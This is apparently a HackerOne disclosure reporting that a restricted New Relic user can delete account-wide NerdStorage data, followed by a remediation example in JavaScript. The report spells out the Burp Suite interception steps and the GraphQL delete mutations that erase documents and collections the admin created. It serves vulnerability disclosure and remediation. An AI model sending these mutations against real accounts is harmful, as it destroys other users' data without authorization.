New Relic: Restricted user can remove NerdStorage documents/collections scoped to ACCOUNT or ENTITY

2019-12-30T17:42:27
ID H1:766145
Type hackerone
Reporter skavans
Modified 2020-08-13T15:40:49

Description

Hey team,

I've found that the Restricted user can remove both documents and whole collections of NerdStorage documents which are scoped to ACCOUNT and ENTITY. I don't know if this is a vulnerability or not, but I think it would be better for you to discuss this internally.

According to the docs, if a user is signed in to the account (or can see the entity), he/she can read and write within the corresponding NerdStorage scopes: {F671723} But, since the Restricted user is usually not allowed to perform destructive actions against the NR data, I think it is a subject for discussion at least. I think there is a possible attack scenario in which the full-fledged account users save some data inside some Nerdpack application (which uses collections scoped to a whole ACCOUNT or to many different ENTITies), and then the Restricted user can easily remove all the data saved by these users.

Steps to reproduce

1) Sign in to NR with the Admin user.
2) Navigate to https://api.newrelic.com/graphiql and intercept the request to nerd-graph.service.newrelic.com with Burp Suite.
3) Change the Content-Type value to application/graphql and change the body to the following GraphQL mutation, replacing 2385914 with your own account ID:

   mutation {
     m1: nerdStoreWriteDocument(
       collection: "test_account_collection"
       documentId: "doc1"
       document: "{\"data\": 1}"
       scope: { id: "2385914" name: ACCOUNTS }
     )
     m2: nerdStoreWriteDocument(
       collection: "test_account_collection"
       documentId: "doc2"
       document: "{\"data\": 2}"
       scope: { id: "2385914" name: ACCOUNTS }
     )
   }

   Send the request. You have now saved some data scoped to your whole account into NerdStorage.
4) Sign in to NR with the Restricted user.
5) Navigate to https://api.newrelic.com/graphiql and intercept the request to nerd-graph.service.newrelic.com with Burp Suite.
6) Change the Content-Type value to application/graphql and change the body to the following GraphQL query, replacing 2385914 with your own account ID:

   query {
     currentUser {
       account(id: 2385914) {
         nerdStoreCollection(collection: "test_account_collection") {
           document
           id
         }
       }
     }
   }

   Send the request and make sure there are 2 documents stored in the collection test_account_collection, scoped to your whole account: {F671732}
7) Change the request body to the following GraphQL mutation, replacing 2385914 with your own account ID:

   mutation {
     nerdStorageDeleteDocument(
       collection: "test_account_collection"
       scope: { id: "2385914" name: ACCOUNT }
       documentId: "doc1"
     ) { deleted }
   }

   Send the request.
8) Execute the query from step 6 again. Make sure the document doc1 saved by the Admin user is removed: {F671733}
9) Change the request body to the following GraphQL mutation, replacing 2385914 with your own account ID:

   mutation {
     nerdStorageDeleteCollection(
       collection: "test_account_collection"
       scope: { id: "2385914" name: ACCOUNT }
     ) { deleted }
   }

   Send the request.
10) Execute the query from step 6 again. Make sure the collection saved by the Admin user was successfully removed by you (the Restricted user): {F671734}

Remediation

In my opinion, you should either restrict the destructive GraphQL mutations for the Restricted user altogether, or allow him to remove only the NerdStorage entities which were created by himself. In the second case, the Restricted user will still be able to create new collections or inject new documents into existing collections and remove all of those, but he won't be able to remove the ones created/injected by full-fledged account users.
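The second remediation option described above, as an added example that is not New Relic's code and not the reporter's: an ownership check on the delete mutations of a small in-memory stand-in for NerdStorage. The store layout, the role names, the createdBy field and the user ids are assumptions; the account id and collection name are those used in the report.

```javascript
// Added example, not New Relic's code: models the remediation option where a Restricted user
// may delete only NerdStorage documents they created. Store layout, role names and createdBy are assumptions.
const key = (scope, collection) => `${scope.name}:${scope.id}:${collection}`;
// Full-fledged (admin) users may delete anything; Restricted users only their own documents.
const canDelete = (user, doc) => user.role === "admin" || doc.createdBy === user.id;

class NerdStore {
  constructor() { this.collections = new Map(); }
  writeDocument(user, { collection, scope, documentId, document }) {
    const k = key(scope, collection);
    if (!this.collections.has(k)) this.collections.set(k, new Map());
    const coll = this.collections.get(k), prev = coll.get(documentId);
    // Overwriting keeps the original creator, so a Restricted user cannot take over a document.
    coll.set(documentId, { document, createdBy: prev ? prev.createdBy : user.id });
  }
  deleteDocument(user, { collection, scope, documentId }) {
    const coll = this.collections.get(key(scope, collection)), doc = coll && coll.get(documentId);
    if (!doc) return { deleted: false };
    if (!canDelete(user, doc)) throw new Error("forbidden: not the document owner");
    coll.delete(documentId);
    return { deleted: true };
  }
  deleteCollection(user, { collection, scope }) {
    const k = key(scope, collection), coll = this.collections.get(k);
    if (!coll) return { deleted: false };
    // Dropping a whole collection requires delete rights on every document in it.
    if (![...coll.values()].every((d) => canDelete(user, d))) throw new Error("forbidden: not owner of all documents");
    this.collections.delete(k);
    return { deleted: true };
  }
}

// Replays the report's steps; the account id is from the report, user ids are constructed.
function replayReport() {
  const store = new NerdStore();
  const admin = { id: "admin-1", role: "admin" }, restricted = { id: "restricted-1", role: "restricted" };
  const scope = { id: "2385914", name: "ACCOUNT" }, collection = "test_account_collection";
  store.writeDocument(admin, { collection, scope, documentId: "doc1", document: '{"data": 1}' });
  store.writeDocument(admin, { collection, scope, documentId: "doc2", document: '{"data": 2}' });
  store.writeDocument(restricted, { collection, scope, documentId: "doc3", document: '{"data": 3}' });
  const attempt = (fn) => { try { return fn().deleted ? "deleted" : "missing"; } catch (e) { return "forbidden"; } };
  return {
    adminDocByRestricted: attempt(() => store.deleteDocument(restricted, { collection, scope, documentId: "doc1" })),
    ownDocByRestricted: attempt(() => store.deleteDocument(restricted, { collection, scope, documentId: "doc3" })),
    collectionByRestricted: attempt(() => store.deleteCollection(restricted, { collection, scope })),
    remaining: [...store.collections.get(key(scope, collection)).keys()],
    collectionByAdmin: attempt(() => store.deleteCollection(admin, { collection, scope })),
  };
}
```

With this check in place, steps 7 and 9 of the report are refused for the Restricted user while the Admin user's documents doc1 and doc2 survive, and the Restricted user keeps the ability to remove the document he wrote himself.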

Impact

The Restricted user can remove NerdStore documents/collections created by full-fledged account users.